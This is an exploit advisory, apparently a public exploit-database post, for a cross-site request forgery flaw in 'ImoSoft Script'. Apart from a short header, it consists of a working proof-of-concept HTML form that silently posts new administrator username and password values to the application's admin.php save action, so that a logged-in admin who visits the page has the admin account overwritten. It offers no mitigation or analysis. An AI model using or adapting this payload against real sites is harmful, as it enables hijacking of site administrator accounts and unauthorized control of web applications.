< ------------------- header data start ------------------- >


#############################################################

# Application Name : ImoSoft Script

# Vulnerable Type : XSRF

# Infection : Administrator password Change Edilebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://www.imosoft.com/demo/admin.php

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >

<h3>BARCOD3</h3>
<form action=http://www.imosoft.com/demo/admin.php?page=admins&action=save&id=2 method=post>
<input class=styled type=hidden name=username id=username value=username>
<input class=styled type=hidden name=password id=password value=passWORD>
<input class=styled type=hidden name=name id=name value=NAME>
<input class=styled type=hidden name=last_login id=last_login value=0>
<input class=styled type=hidden name=last_ip id=last_ip value=LASTIP>
<input name=Submit type=submit value=Submit class=formBtn />
</form>

< -- bug code end of -- >